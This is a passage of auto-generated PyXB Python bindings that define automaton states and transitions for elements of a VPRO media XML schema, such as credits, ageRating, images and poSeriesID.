symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'credits')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 301, 6))
st_21 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_21)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_20, False))
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'award')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 302, 6))
st_22 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_22)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_21, False))
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'descendantOf')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 303, 6))
st_23 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_23)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_22, False))
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'memberOf')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 304, 6))
st_24 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_24)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_23, False))
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'ageRating')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 305, 6))
st_25 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_25)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_24, False))
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'contentRating')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 306, 6))
st_26 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_26)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_25, False))
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'email')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 307, 6))
st_27 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_27)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_26, False))
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'website')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 308, 6))
st_28 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_28)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_27, False))
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'twitter')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 309, 6))
st_29 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_29)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_28, False))
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'teletext')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 310, 6))
st_30 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_30)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_29, False))
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'prediction')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 311, 6))
st_31 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_31)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_30, False))
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'locations')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 312, 6))
st_32 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_32)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_31, False))
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'relation')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 313, 6))
st_33 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_33)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_32, False))
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'images')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 314, 6))
st_34 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_34)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_33, False))
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'poSeriesID')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 841, 10))
st_35 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_35)
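# Wire the transition sets: an UpdateInstruction with True increments the
# counter (another occurrence of the same particle), while False resets it
# when advancing past that particle.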
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
transitions.append(fac.Transition(st_2, [
]))
transitions.append(fac.Transition(st_3, [
]))
transitions.append(fac.Transition(st_4, [
]))
transitions.append(fac.Transition(st_5, [
]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_1, False) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_2, False) ]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_3, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_3, False) ]))
st_4._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_5, [
]))
transitions.append(fac.Transition(st_6, [
]))
transitions.append(fac.Transition(st_7, [
]))
transitions.append(fac.Transition(st_8, [
]))
transitions.append(fac.Transition(st_9, [
]))
transitions.append(fac.Transition(st_10, [
]))
transitions.append(fac.Transition(st_11, [
]))
transitions.append(fac.Transition(st_12, [
]))
transitions.append(fac.Transition(st_13, [
]))
transitions.append(fac.Transition(st_14, [
]))
transitions.append(fac.Transition(st_15, [
]))
transitions.append(fac.Transition(st_16, [
]))
transitions.append(fac.Transition(st_17, [
]))
transitions.append(fac.Transition(st_18, [
]))
transitions.append(fac.Transition(st_19, [
]))
transitions.append(fac.Transition(st_20, [
]))
transitions.append(fac.Transition(st_21, [
]))
transitions.append(fac.Transition(st_22, [
]))
transitions.append(fac.Transition(st_23, [
]))
transitions.append(fac.Transition(st_24, [
]))
transitions.append(fac.Transition(st_25, [
]))
transitions.append(fac.Transition(st_26, [
]))
transitions.append(fac.Transition(st_27, [
]))
transitions.append(fac.Transition(st_28, [
]))
transitions.append(fac.Transition(st_29, [
]))
transitions.append(fac.Transition(st_30, [
]))
transitions.append(fac.Transition(st_31, [
]))
transitions.append(fac.Transition(st_32, [
]))
transitions.append(fac.Transition(st_33, [
]))
transitions.append(fac.Transition(st_34, [
]))
transitions.append(fac.Transition(st_35, [
]))
st_5._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_4, True) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_4, False) ]))
st_6._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_5, True) ]))
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_5, False) ]))
st_7._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_6, True) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_6, False) ]))
st_8._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_7, True) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_7, False) ]))
st_9._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_8, True) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_8, False) ]))
st_10._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_9, True) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_9, False) ]))
st_11._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_10, True) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_10, False) ]))
st_12._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_11, True) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_11, False) ]))
st_13._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_12, True) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_12, False) ]))
st_14._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_13, True) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_13, False) ]))
